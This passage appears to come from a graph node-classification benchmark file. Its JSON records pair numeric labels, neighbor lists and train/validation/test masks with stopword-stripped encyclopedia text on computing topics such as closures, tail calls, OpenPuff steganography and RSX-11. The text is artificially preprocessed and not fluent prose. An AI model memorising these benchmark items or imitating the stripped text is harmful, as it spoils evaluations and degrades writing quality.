variables codice_11 codice_6 use relative memory location signified local variable codice_3 instances behaviour may undesirable necessary bind different lexical closure ecmascript would done using codice_35 example expected behaviour would link emit id clicked variable e bound scope lazy evaluated click actually happens click event emits id last element 'elements bound end loop variable codice_36 would need bound scope block using codice_37 codice_38 keyword hand many functional languages ml bind variables directly values case since way change value variable bound need share state closures—they use values often called capturing variable value java local anonymous classes also fall category—they require captured local variables codice_39 also means need share state languages enable choose capturing value variable location example c++11 captured variables either declared codice_40 means captured reference codice_41 means captured value yet another subset lazy functional languages haskell bind variables results future computations rather values consider example haskell binding codice_42 captured closure defined within function codice_31 computation codice_44—which case results division zero however since computation captured value error manifests closure invoked actually attempts use captured binding yet differences manifest behavior lexically scoped constructs codice_45 codice_46 codice_47 statements constructs general considered terms invoking escape continuation established enclosing control statement case codice_46 codice_47 interpretation requires looping constructs considered terms recursive function calls languages ecmascript codice_45 refers continuation established closure lexically innermost respect statement—thus codice_45 within closure transfers control code called however smalltalk superficially similar operator codice_52 invokes escape continuation established method invocation ignoring escape continuations intervening nested closures escape continuation particular closure invoked smalltalk implicitly reaching end closure code following examples ecmascript smalltalk highlight difference code snippets behave differently smalltalk codice_52 operator javascript codice_45 operator analogous ecmascript example codice_55 leave inner closure begin new iteration codice_56 loop whereas smalltalk example codice_57 abort loop return method codice_31 common lisp provides construct express either actions lisp codice_59 behaves smalltalk codice_57 lisp codice_61 behaves javascript codice_55 hence smalltalk makes possible captured escape continuation outlive extent successfully invoked consider closure returned method codice_31 invoked attempts return value invocation codice_31 created closure since call already returned smalltalk method invocation model follow spaghetti stack discipline facilitate multiple returns operation results error languages ruby enable programmer choose way codice_45 captured example ruby codice_66 codice_7 example ways create closure semantics closures thus created different respect codice_45 statement scheme definition scope codice_45 control statement explicit arbitrarily named 'return sake example following direct translation ruby sample languages features simulate behavior closures languages java c++ objective-c c vb.net features result language object-oriented paradigm c libraries support callbacks sometimes implemented providing two values registering callback library function pointer separate codice_70 pointer arbitrary data user choice library executes callback function passes along data pointer enables callback maintain state refer information captured time registered library idiom similar closures functionality syntax codice_70 pointer type safe c idiom differs type-safe closures c haskell ml callbacks extensively used gui widget toolkits implement event-driven programming associating general functions graphical widgets menus buttons check boxes sliders spinners etc application-specific functions implementing specific desired behavior application gcc extension nested function used function pointer emulate closures providing containing function exit example invalid typedef int *fn_int_to_int int //type function int- int fn_int_to_int adder int number int main void java enables classes defined inside methods called local classes classes named known anonymous classes anonymous inner classes local class either named anonymous may refer names lexically enclosing classes read-only variables marked codice_39 lexically enclosing method capturing codice_39 variables enables capture variables value even variable want capture non-codice_39 always copy temporary codice_39 variable class capturing variables reference emulated using codice_39 reference mutable container example single-element array local class able change value container reference able change contents container advent java 8 lambda expressions closure causes code executed local classes one types inner class declared within body method java also supports inner classes declared non-static members enclosing class normally referred inner classes defined body enclosing class full access instance variables enclosing class due binding instance variables inner class may instantiated explicit binding instance enclosing class using special syntax upon execution print integers 0 9 beware confuse type class nested class declared way accompanied usage static modifier desired effect instead classes special binding defined enclosing class java 8 java supports functions first class objects lambda expressions form considered type codice_77 domain u image type expression called codice_78 method standard method call apple introduced blocks form closure nonstandard extension c c++ objective-c 2.0 mac os x 10.6 snow leopard ios 4.0 apple made implementation available gcc clang compilers pointers block block literals marked codice_52 normal local variables captured value block created read-only inside block variables captured reference marked codice_80 blocks need persist outside scope created may need copied c sharp programming language |c anonymous methods lambda expressions support closure visual basic .net many language features similar c also supports lambda expressions closures programming language |d closures implemented delegates function pointer paired context pointer e.g class instance stack frame heap case closures version 1 limited closure support example code work correctly variable stack returning test longer valid use probably calling foo via dg return 'random integer solved explicitly allocating variable heap using structs class store needed closed variables construct delegate method implementing code closures passed functions long used referenced values still valid example calling another function closure callback parameter useful writing generic data processing code limitation practice often issue limitation fixed version 2 variable automatically allocated heap used inner function delegate function escape current scope via assignment dg return local variables arguments referenced delegates referenced delegates escape current scope remain stack simpler faster heap allocation true inner class methods references function variables c++ enables defining function object overloading codice_81 objects behave somewhat like functions functional programming language may created runtime may contain state implicitly capture local variables closures c++11|the 2011 revision c++ language also supports closures type function object constructed automatically special language construct called lambda-expression c++ closure may capture context either storing copies accessed variables members closure object reference latter case closure object escapes scope referenced object invoking codice_81 causes undefined behavior since c++ closures extend lifetime context eiffel programming language |eiffel includes inline agents defining closures inline agent object representing routine defined giving code routine in-line example argument codice_83 agent representing procedure two arguments procedure finds country corresponding coordinates displays whole agent subscribed event type codice_84 certain button whenever instance event type occurs button — user clicked button — procedure executed mouse coordinates passed arguments codice_3 codice_86 main limitation eiffel agents distinguishes closures languages reference local variables enclosing scope design decision helps avoiding ambiguity talking local variable value closure latest value variable value captured agent created codice_87 reference current object analogous codice_88 java features arguments agent accessed within agent body values outer local variables passed providing additional closed operands agent embarcadero c++builder provides reserve word __closure provide pointer method similar syntax function pointer standard c could write pointer function type using following syntax typedef void *tmyfunctionpointer void similar way declare pointer method using following syntax typedef void __closure *tmymethodpointer category programming language concepts category implementation functional programming languages category subroutines category articles example python code category articles example scheme code category articles example javascript code category articles example c++ code category articles example eiffel code category articles example c sharp code category articles example code category articles example objective-c code category articles example java code category articles example ruby code category articles example smalltalk code category articles example haskell code",
    "neighbors": [
      512,
      2304,
      386,
      3462,
      7175,
      6536,
      9225,
      8587,
      2062,
      655,
      10510,
      3990,
      5783,
      8854,
      2585,
      11674,
      1947,
      10011,
      9245,
      10395,
      1954,
      10403,
      3876,
      10532,
      5031,
      4777,
      5165,
      5677,
      435,
      1715,
      1333,
      3767,
      6074,
      9914,
      1982,
      8262,
      7756,
      333,
      1613,
      9680,
      337,
      7889,
      11219,
      727,
      9047,
      9561,
      7386,
      2011,
      10083,
      10211,
      6502,
      10470,
      8554,
      5360,
      9078,
      7292,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10582,
    "label": 4,
    "text": "OpenPuff:openpuff openpuff steganography watermarking sometimes abbreviated openpuff puff freeware steganography tool microsoft windows created cosimo oliboni still maintained independent software program notable first steganography tool version 1.01 released december 2004 last revision supports wide range carrier formats openpuff used primarily anonymous asynchronous data sharing advantage steganography cryptography alone messages attract attention plainly visible encrypted messages — matter unbreakable — arouse suspicion may incriminating countries encryption illegal therefore whereas cryptography protects contents message steganography said protect messages communicating parties watermarking action signing file id copyright mark openpuff invisible steganographic way applied supported carrier invisible mark password protected accessible everyone using program openpuff semi-open source program cryptographic algorithms 16 taken aes nessie cryptrec joined unique multi-cryptography algorithm extensive testing performed statistical resistance properties csprng multi-cryptography modules using ent nist diehard test suites provided results taken 64kb 128kb ... 256mb samples security performance steganalysis resistance conflicting trade-offs security vs performance whitening security vs. steganalysis cryptography whitening data carrier injection encrypted whitened small amount hidden data turns big chunk pseudorandom suspicious data carrier injection encodes using non linear covering function takes also original carrier bits input modified carriers need much less change con1 lowering random-like statistical response deceive many steganalysis tests con2 always non-negligible probability detected even hidden stream behaves like “ natural container ” unpredictable side-effects caught flagrante delicto etc. resisting unpredictable attacks also possible even user forced legal physical coercion provide valid password deniable steganography decoy-based technique allows user deny convincingly fact sensitive data hidden user needs provide expendable decoy data would plausibly want keep confidential reveal attacker claiming",
    "neighbors": [
      9289,
      4617,
      6797,
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10583,
    "label": 2,
    "text": "Nokia_Nseries:nokia nseries nokia nseries multimedia smartphone tablet product family engineered marketed nokia corporation nseries devices commonly supported multiple high-speed wireless technologies 3g wireless lan digital multimedia services music playback photo/video capture viewing gaming internet services also supported line replaced 2011 nokia lumia line company flagship smartphone portfolio nokia n1 tablet introduced november 2014 revived n prefix marketed 'nseries 27 april 2005 nokia announced new brand multimedia devices press conference mobile phone manufacturers amsterdam first three nseries devices introduced conference consists n70 n90 n91 2 november 2005 nokia announced n71 n80 n92 25 april 2006 nokia announced n72 n73 n93 26 september 2006 nokia announced n75 n95 8 january 2007 nokia announced nokia n76 nokia n77 nokia n93i 29 august 2007 nokia announced n95 8gb n81 n81 8gb 14 november 2007 nokia announced n82 first nokia xenon flash 2008 gsma held barcelona n96 n78 unveiled two new nseries devices revealed end august 2008 nokia n79 nokia n85 december 2 2008 nokia nseries announced nokia n97 february 17 2009 nokia announced nokia n86 8 mp nokia first 8-megapixel phone nokia n8 12-megapixel camera announced april 2010 21 june 2011 nokia showcased nokia n9 based meego os fourth non-symbian nseries device n800 n810 n900 nseries retired replaced lumia year company introduced nokia n1 tablet november 18 2014 marked return n prefix 'nseries branding still absent nokia nseries aimed users looking pack many features possible one device better-than-average cameras often found nseries devices many using higher-quality carl zeiss optics one example video music playback photo viewing capabilities devices resemble standalone portable media devices 2008 recently launched devices gps mp3 player wlan functionality also present numbers describe traits phone exceptions though considering n8x n82 n86 8mp top-of-the-range smartphones advanced cameras clearly 'high-end fellow n9x models first nseries device n90 ran symbian os 8.1 mobile operating system n70 n72 nokia n8 released september 2010 world first phone run symbian^3 first phone nokia featuring 12-megapixel autofocus lens also last nseries phone run symbian os n800 n810 n900 nokia chose use linux-based maemo operating system last nseries mobile phones n9 developer-only n950 released september 2011 maemo merged intel moblin create meego may 2010 nokia opted use meego harmattan 1.2 n9/n950 november 18 2014 nokia announced n1 android 5.0 tablet june nokia connections singapore nokia launched new n9 meego 1.2 harmattan os company calls qt device whole app ui framework written qt also world first pure touch phone buttons home screen great new swipe ui reviews average good phone reviewers liking phone good quality operating system expressing concern fact loses competitors terms specs device expected sold selected regions q3 2011",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      823,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      3162,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10584,
    "label": 9,
    "text": "Tail_call:tail call computer science tail call subroutine call performed final action procedure tail call might lead subroutine called later call chain subroutine said tail-recursive special case recursion tail recursion tail-end recursion particularly useful often easy handle implementations tail calls implemented without adding new stack frame call stack frame current procedure longer needed replaced frame tail call modified appropriate similar overlay processes function calls program jump called subroutine producing code instead standard call sequence called tail call elimination tail call elimination allows procedure calls tail position implemented efficiently goto statements thus allowing efficient structured programming words guy l. steele general procedure calls may usefully thought goto statements also pass parameters uniformly coded machine code jump instructions programming languages require tail call elimination however functional programming languages tail call elimination often guaranteed language standard allowing tail recursion use similar amount memory equivalent loop special case tail recursive calls function calls may amenable call elimination general tail calls language semantics explicitly support general tail calls compiler often still optimize sibling calls tail calls functions take return types caller function called computer must remember place called return address return location result call complete typically information saved call stack simple list return locations order times call locations describe reached tail calls need remember caller – instead tail call elimination leaves stack alone except possibly function arguments local variables newly-called function return directly original caller tail call n't appear lexically statements source code important calling function return immediately tail call returning tail call result since calling function never get chance anything call optimization performed non-recursive function calls usually optimization saves little time space since many different functions available call dealing recursive mutually recursive functions recursion happens tail calls however stack space number returns saved grow significant since function call directly indirectly creating new call stack frame time tail call elimination often asymptotically reduces stack space requirements linear n constant 1 tail call elimination thus required standard definitions programming languages scheme languages ml family among others scheme language definition formalizes intuitive notion tail position exactly specifying syntactic forms allow results tail context implementations allowing unlimited number tail calls active moment thanks tail call elimination also called 'properly tail-recursive besides space execution efficiency tail call elimination important functional programming idiom known continuation-passing style cps would otherwise quickly run stack space tail call located syntactical end function codice_1 codice_2 calls codice_3 last thing procedure executes returning thus tail position however tail calls necessarily located syntactical end subroutine calls codice_3 codice_5 tail position lies end if-branch respectively even though first one syntactically end codice_6 body code call codice_1 tail position codice_8 tail position either codice_9 codice_10 control must return caller allow inspect modify return value returning following program example scheme written tail recursion style multiplication function tail position compared program assumes applicative-order evaluation inner procedure codice_11 calls last control flow allows interpreter compiler reorganize execution would ordinarily look like efficient variant terms space time reorganization saves space state except calling function address needs saved either stack heap call stack frame codice_11 reused intermediate results storage also means programmer need worry running stack heap space extremely deep recursions typical implementations tail recursive variant substantially faster variant constant factor programmers working functional languages rewrite recursive code tail-recursive take advantage feature often requires addition accumulator argument codice_13 example function cases filtering lists languages full tail recursion may require function previously purely functional written mutates references stored variables tail recursion modulo cons generalization tail recursion optimization introduced david h. d. warren context compilation prolog seen explicitly set language described though named daniel p. friedman david s. wise 1974 lisp compilation technique name suggests applies operation left perform recursive call prepend known value front list returned perform constant number simple data-constructing operations general call would thus tail call save modulo said cons operation prefixing value start list exit recursive call appending value end growing list entry recursive call thus building list side effect implicit accumulator parameter following prolog fragment illustrates concept thus tail recursive translation call transformed first creating new list node setting codice_14 field making tail call pointer node codice_15 field argument filled recursively following fragment defines recursive function c duplicates linked list form function tail-recursive control returns caller recursive call duplicates rest input list even allocate head node duplicating rest would still need plug result recursive call codice_16 field call function almost tail-recursive warren method pushes responsibility filling codice_16 field recursive call thus becomes tail call sentinel head node used simplify code callee appends end growing list rather caller prepend beginning returned list work done way forward list start recursive call proceeds instead backward list end recursive call returned result thus similar accumulating parameter technique turning recursive computation iterative one characteristically technique parent frame created execution call stack tail-recursive callee reuse call frame tail-call optimization present tail-recursive implementation converted explicitly iterative form accumulating loop paper delivered acm conference seattle 1977 guy l. steele summarized debate goto structured programming observed procedure calls tail position procedure best treated direct transfer control called procedure typically eliminating unnecessary stack manipulation operations since tail calls common lisp language procedure calls ubiquitous form optimization considerably reduces cost procedure call compared implementations steele argued poorly implemented procedure calls led artificial perception goto cheap compared procedure call steele argued general procedure calls may usefully thought goto statements also pass parameters uniformly coded machine code jump instructions machine code stack manipulation instructions considered optimization rather vice versa steele cited evidence well optimized numerical algorithms lisp could execute faster code produced then-available commercial fortran compilers cost procedure call lisp much lower scheme lisp dialect developed steele gerald jay sussman tail call elimination guaranteed implemented interpreter tail recursion important high-level languages especially functional logic languages members lisp family languages tail recursion commonly used way sometimes way available implementing iteration language specification scheme requires tail calls optimized grow stack tail calls made explicitly perl variant goto statement takes function name codice_18 however language implementations store function arguments local variables call stack default implementation many languages least systems hardware stack x86 implementing generalized tail call optimization presents issue size callee activation record different caller additional cleanup resizing stack frame may required cases optimizing tail recursion remains trivial general tail call optimization may harder implement efficiently example java virtual machine jvm tail-recursive calls eliminated reuses existing call stack general tail calls changes call stack result functional languages scala target jvm efficiently implement direct tail recursion mutual tail recursion gcc llvm/clang intel compiler suites perform tail call optimization c languages higher optimization levels codice_19 option passed though given language syntax may explicitly support compiler make optimization whenever determine return types caller callee equivalent argument types passed function either require amount total storage space call stack various implementation methods available tail calls often optimized interpreters compilers functional programming logic programming languages efficient forms iteration example scheme programmers commonly express loops calls procedures tail position rely scheme compiler interpreter substitute tail calls efficient jump instructions compilers generating assembly directly tail call elimination easy suffices replace call opcode jump one fixing parameters stack compiler perspective first example initially translated pseudo-assembly language fact valid x86 assembly tail call elimination replaces last two lines single jump instruction subroutine codice_20 completes return directly return address codice_21 omitting unnecessary codice_22 statement typically subroutines called need supplied parameters generated code thus needs make sure call frame properly set jumping tail-called subroutine instance platforms call stack contain return address also parameters subroutine compiler may need emit instructions adjust call stack platform code codice_23 codice_24 parameters compiler might translate tail call optimizer could change code code efficient terms execution speed use stack space since many scheme compilers use c intermediate target code tail recursion must encoded c without growing stack even c compiler optimize tail calls many implementations achieve using device known trampoline piece code repeatedly calls functions functions entered via trampoline function tail-call another instead calling directly returning result returns address function called call parameters back trampoline called trampoline takes care calling function next specified parameters ensures c stack grow iteration continue indefinitely possible implement trampolines using higher-order functions languages support groovy visual basic .net c using trampoline function calls rather expensive normal c function call least one scheme compiler chicken uses technique first described henry baker unpublished suggestion andrew appel normal c calls used stack size checked every call stack reaches maximum permitted size objects stack garbage-collected using cheney algorithm moving live data separate heap following stack unwound popped program resumes state saved garbage collection baker says appel method avoids making large number small trampoline bounces occasionally jumping empire state building garbage collection ensures mutual tail recursion continue indefinitely however approach requires c function call ever returns since guarantee caller stack frame still exists therefore involves much dramatic internal rewriting program code continuation-passing style tail recursion related control flow operator means transformation following construct transforms preceding x may tuple involving one variable care must taken designing assignment statement x ← bar x dependencies respected one may need introduce auxiliary variables use swap construct general uses tail recursion may related control flow operators break continue following bar baz direct return calls whereas quux quuux involve recursive tail call foo translation given follows",
    "neighbors": [
      2304,
      4101,
      3462,
      8582,
      9866,
      2062,
      2832,
      3475,
      6933,
      8854,
      10395,
      5663,
      1952,
      3876,
      5031,
      4777,
      5803,
      10796,
      10670,
      5040,
      1715,
      692,
      2105,
      6074,
      10043,
      2620,
      8000,
      5059,
      6596,
      10571,
      7889,
      7386,
      477,
      10333,
      11490,
      10083,
      8421,
      6502,
      487,
      4968,
      7273,
      2666,
      8554,
      10469,
      10470,
      6767,
      5872,
      9330,
      499,
      9714,
      10102,
      3705,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 10585,
    "label": 9,
    "text": "Data_descriptor:data descriptor computing data descriptor structure containing information describes data data descriptors may used compilers software structure run time languages like ada pl/i hardware structure computers burroughs large systems data descriptors typically used run-time pass argument information called subroutines hp openvms multics system-wide language-independent standards argument descriptors descriptors also used hold information data fully known run-time dynamically allocated array unlike dope vector data descriptor contain address information following descriptor used ibm enterprise pl/i describe character string source array descriptor multics definitions include structure base array information structure dimension multics ran systems 36-bit words",
    "neighbors": [
      1952,
      1702,
      428,
      3443,
      6772,
      8502,
      2936
    ],
    "mask": "None"
  },
  {
    "node_id": 10586,
    "label": 9,
    "text": "Comparison_of_programming_languages_(basic_instructions):comparison programming languages basic instructions comparison programming languages common topic discussion among software engineers basic instructions several programming languages compared bold literal code non-bold interpreted reader statements guillemets « … » optional indicates necessary indent whitespace standard constants codice_1 codice_2 used determine many 'codice_3 'codice_4 usefully prefixed 'codice_5 'codice_6 actually size 'codice_5 'codice_8 'codice_6 available constants codice_10 codice_11 codice_12 etc standard constants codice_39 codice_40 used determine many 'codice_3 'codice_4 usefully prefixed 'codice_43 'codice_44 actually size 'codice_43 'codice_46 'codice_44 available constants codice_48 codice_49 codice_50 etc constants codice_51 codice_52 codice_53 available type machine epsilon value n provided codice_54 intrinsic function specifically strings arbitrary length automatically managed language separate character type characters represented strings length 1 expressions except codice_65 codice_66 operators values array types c automatically converted pointer first argument see c syntax arrays details syntax pointer operations classes supported pascal declaration blocks see comparison programming languages basic instructions functions types regular objects assign single instruction written line following colon multiple instructions grouped together block starts newline indentation required conditional expression syntax follow rule codice_74 n used change loop interval codice_74 omitted loop interval 1 common lisp allows codice_80 codice_81 codice_82 define restarts use codice_83 unhandled conditions may cause implementation show restarts menu user unwinding stack pascal declaration blocks see comparison programming languages basic instructions functions see reflection calling declaring functions strings string signed decimal number br algol 68 additionally unformatted transput routines codice_91 codice_92 br codice_93 codice_94 read unformatted text stdin use gets recommended fortran 2008 newer",
    "neighbors": [
      10752,
      8582,
      1931,
      2062,
      6414,
      6160,
      5521,
      10510,
      8854,
      3736,
      1435,
      155,
      9245,
      6558,
      5663,
      11555,
      3876,
      5796,
      428,
      5165,
      5677,
      5806,
      9008,
      3765,
      2102,
      7479,
      10043,
      10684,
      3904,
      963,
      8644,
      8262,
      5961,
      1610,
      1611,
      8524,
      3577,
      8397,
      847,
      9804,
      7889,
      11212,
      11219,
      3960,
      5588,
      7894,
      2519,
      4057,
      10586,
      11610,
      8414,
      10083,
      3045,
      4069,
      10470,
      7274,
      8554,
      8303,
      6640,
      1016,
      3705,
      7292,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 10587,
    "label": 9,
    "text": "Behat_(computer_science):behat computer science behat test framework behavior-driven development written php programming language behat created konstantin kudryashov development hosted github behat intended aid communication developers clients stakeholders software development process allows clear documentation testable examples software intended behaviour behat test scenarios written gherkin business-readable domain-specific language following defined patterns tests run point new code introduced codebase confirm regressions within existing test coverage introduced integrated selenium browser emulators generate screenshots failures like bdd frameworks behat scenarios series given steps explain business case definition steps exist within method annotations class extends behatcontext preconditions given correspond php method name execute",
    "neighbors": [
      1034,
      6154,
      9614,
      2465,
      2348,
      7983,
      190,
      6338,
      2372,
      8644,
      1353,
      4171,
      11221,
      11357,
      3553,
      7785,
      7147,
      5612,
      4853,
      11259,
      7293
    ],
    "mask": "None"
  },
  {
    "node_id": 10588,
    "label": 5,
    "text": "Publius_(publishing_system):publius publishing system publius web protocol developed lorrie cranor avi rubin marc waldman gives individuals ability publish information web anonymously high guarantee publications censored modified third party nine design goals publius development team publius web system consists following agents publius system relies static list web servers publisher wishes add contents web first encrypts using random symmetric key k k split n shares parts least k n shares required reconstruction k see also secret sharing subset servers receives another share k encryption result using key k e k br retriever wishes obtain original contents follows generated url corresponds contents combined portion k appears subset servers list gathering k different shares copy e k allows retriever reconstruct key k shares decrypt e k back modification removal server hosted contents issued original publishers using combination password hosting server domain name present publius supports hosting html pages images file formats pdfs postscripts publius protocol allows following operations publisher wishes add web contents publius web publius client software publius client proxy executes following steps br diagram describing selection servers servers list hold encrypted contents hashed directory names publish operation done chosen server location formula_6 servers list holds following files directory named formula_7 retriever wishes browse web contents publius web publius client software publius client proxy executes following steps delete operation implemented invoking cgi script running servers server hash result formula_22 namely md5 hash result concatenation server domain name publisher password sent along corresponding formula_7 string compared one already stored password file directory formula_7 match file file removed directory update operation similarly uses hashed concatenation server domain name publisher password order authenticate original ownership hosted contents operation update done adding additional update file formula_7 contains new publius url matching updated contents recall publius url tied published contents share encryption key verified contents retrieved fact update operation equivalent publish operation addition adding update file old formula_7 directory redirecting future retrieve request new url retrieve operation issued old url publius proxy client redirected fetch new url done rest k -1 chosen servers k resulting urls match another set k servers chosen retrieval encrypted web contents publius protocol traceable publius urls following format formula_27 formula_28 concatenation hash results original contents combined key share described publish operation previous section options section url 16 bits represented two characters ascii string containing",
    "neighbors": [
      225,
      4490,
      8627,
      8628,
      2485,
      1501
    ],
    "mask": "Test"
  },
  {
    "node_id": 10589,
    "label": 5,
    "text": "IL_(network_protocol):il network protocol internet link protocol il connection-based transport layer protocol designed bell labs originally part plan 9 operating system used carry 9p assigned internet protocol number 40 similar tcp much simpler main features fourth edition plan 9 2003 il deprecated favor tcp/ip n't handle long-distance connections well",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      8610,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 10590,
    "label": 2,
    "text": "RSX-11:rsx-11 rsx-11 discontinued family multi-user real-time operating systems pdp-11 computers created digital equipment corporation widespread use late 1970s early 1980s rsx-11 influential development later operating systems vms windows nt designed mainly used process control also popular program development rsx-11 began port pdp-11 architecture earlier rsx-15 operating system pdp-15 minicomputer first released 1971 main architect rsx-15 later renamed xvm/rsx dan brevick commenting rsx acronym brevik says porting effort first produced small paper tape based real-time executives rsx-11a rsx-11c later gained limited support disks rsx-11b rsx-11b evolved fully fledged rsx-11d disk-based operating system first appeared pdp-11/40 pdp-11/45 early 1973 project leader rsx-11d version 4 henry krejci rsx-11d completed digital set adapt small memory footprint giving birth rsx-11m first released 1973 1971 1976 rsx-11m project spearheaded noted operating system designer dave cutler first project principles first tried rsx-11m appear also later designs led cutler dec vms microsoft windows nt direction ron mclean derivative rsx-11m called rsx-20f developed run pdp-11/40 front-end processor kl10 pdp-10 cpu meanwhile rsx-11d saw developments direction garth wolfendale project leader 1972–1976 system redesigned saw first commercial release support 22-bit pdp-11/70 system added wolfendale originally uk also set team designed prototyped ias operating system uk ias variant rsx-11d suitable time sharing later development release ias led andy wilson digital uk facilities estimated release dates rsx-11 ias data taken printing date associated documentation general availability date expected come closely manuals different printing dates latest date used rsx-11s proper subset rsx-11m release dates always assumed corresponding version rsx-11m side rsx-11m plus enhanced version rsx-11m expected later corresponding version rsx-11m rsx-11 proprietary software copyright asserted binary files source code documentation alike entirely developed internally digital therefore part open source however copy kernel source comments removed present every rsx distribution used system generation process notable exception rule micro-rsx came pre-generated autoconfiguring binary kernel commented kernel source code available separate product already binary license reference purposes ownership rsx-11s rsx-11m rsx-11m plus micro/rsx transferred digital mentec inc. march 1994 part broader agreement mentec inc. us subsidiary mentec limited irish firm specializing pdp-11 hardware software support december 2006 mentec inc. acquired irish firm calyx sell pdp-11 related services goods new commercial licenses therefore legally unobtainable hobbyists run rsx-11m version 4.3 earlier rsx-11m plus version 3.0 earlier simh emulator thanks free license granted may 1998 mentec inc. legal ownership rsx-11a rsx-11b rsx-11c rsx-11d ias never changed hands therefore passed compaq acquired digital 1998 hewlett-packard 2002 late 2015 hewlett-packard split two separate companies hp inc. hewlett packard enterprise current owner firmly established new commercial licenses issued least since october 1979 rsx-11a rsx-11b rsx-11c 1990 ias one operating systems ever licensed hobbyist use 1968 soviet government decided manufacturing copies ibm mainframes dec minicomputers cooperation comecon countries practical pursuing original designs cloning dec designs began 1974 name sm-evm cyrillic см эвм см эвм acronym 'система малых электронно-вычислительных машин russian 'system small electronic computing machines happened es evm mainframes based system/360 architecture russians allies sometimes significantly modified western designs therefore every sm-evm machine compatible dec offerings time clone rsx-11m operating system ran romanian-made coral family computers coral 2030 clone pdp-11 rsx-11 often used general-purpose timeshare computing even though target market competing rsts/e operating system rsx-11 provided features ensure better maximum necessary response time peripheral device input i.e real-time processing original intended use features included ability lock process called task rsx memory part system boot assign process higher priority would execute processes lower priority order support large programs within pdp-11 relatively small virtual address space 64 kb sophisticated semi-automatic overlay system used given program overlay scheme produced rsx taskbuilder program called tkb overlay scheme especially complex taskbuilding could take rather long time hours days standard rsx prompt mcr monitor console routine commands shortened first three characters entered correspondingly commands unique first three characters login command hello executed user yet logged hello chosen login command first three characters hel relevant allows non-logged user execute help command run certain pdp-11 processors dec operating system displays characteristic light pattern processor console panel system idle patterns created idle task running lowest level rsx-11m light pattern two sets lights sweep outwards left right center console inwards ind indirect command file processor program currently running contrast ias light pattern single bar lights swept leftwards correspondingly jumbled light pattern reflecting memory fetches visible indication computer load idle task executed pdp-11 operating systems rsts/e distinctive patterns console lights",
    "neighbors": [
      2560,
      6155,
      10257,
      6675,
      7187,
      10776,
      25,
      8729,
      4637,
      9759,
      9762,
      4643,
      6180,
      7217,
      6194,
      10803,
      10809,
      6207,
      576,
      2625,
      3650,
      8262,
      6221,
      3160,
      10333,
      97,
      11363,
      5220,
      1126,
      1638,
      6760,
      10856,
      9835,
      7285,
      4727,
      9335,
      11383,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      6276,
      10883,
      10891,
      6797,
      10382,
      9366,
      7319,
      6296,
      2201,
      9370,
      9882,
      3230,
      9887,
      8876,
      5293,
      8879,
      178,
      9907,
      6837,
      6329,
      8889,
      6846,
      5823,
      8388,
      1221,
      9927,
      1736,
      2248,
      5328,
      5840,
      8402,
      1750,
      7382,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      10475,
      242,
      5363,
      10482,
      757,
      9466,
      9468,
      1278,
      5384,
      1804,
      8976,
      273,
      8977,
      787,
      789,
      5397,
      8474,
      10016,
      9507,
      292,
      10235,
      2345,
      10030,
      7983,
      6448,
      2355,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      321,
      10561,
      11075,
      4423,
      6985,
      5452,
      6988,
      7504,
      5457,
      7507,
      341,
      7511,
      5982,
      2399,
      3426,
      9060,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      7032,
      8573,
      7039,
      8063,
      6529,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11675,
      9628,
      2462,
      5022,
      7076,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      11187,
      10676,
      1464,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9162,
      2507,
      9166,
      6624,
      5603,
      10730,
      10731,
      8687,
      6128,
      5105,
      3571,
      5619,
      11256,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 10591,
    "label": 0,
    "text": "Parody_generator:parody generator parody generators computer programs generate text syntactically correct usually meaningless often style technical paper particular writer also called travesty generators random text generators purpose often satirical intending show little difference generated text real examples many work using techniques markov chains reprocess real text examples alternatively may hand-coded generated texts vary essay length paragraphs tweets term quote generator also used software randomly selects real quotations",
    "neighbors": [
      6208,
      2440,
      5098,
      1652,
      5278
    ],
    "mask": "Test"
  },
  {
    "node_id": 10592,
    "label": 2,
    "text": "Motd_(Unix):motd unix /etc/motd file unix-like systems contains message day used send common message users efficient manner sending e-mail message systems might also motd feature motd info segment multics contents file /etc/motd displayed unix login command successful login executes login shell newer unix-like systems may generate message dynamically host boots user logs motd also become common feature online component windows pc games half-life call duty battlefield similar feature called motd displayed logging irc servers",
    "neighbors": [
      5435,
      5492,
      5397,
      7325
    ],
    "mask": "Test"
  },
  {
    "node_id": 10593,
    "label": 9,
    "text": "Parser_(CGI_language):parser cgi language parser free server-side cgi web scripting language developed art lebedev studio released gpl originally parser merely simple macro processing language latest 3rd revision march 2006 introduced object-oriented programming features compiler language developed c++ studio employees konstantin morshnev alexander petrosyan automate often repeated tasks especially maintenance already existing websites used many web projects studio since revision 3 released free software used websites mostly russia according partial list language website language supports technologies needed common web design tasks xml document object model dom perl compatible regular expressions pcre others",
    "neighbors": [
      9345,
      10506,
      5612,
      7983,
      9780,
      2485,
      5399,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 10594,
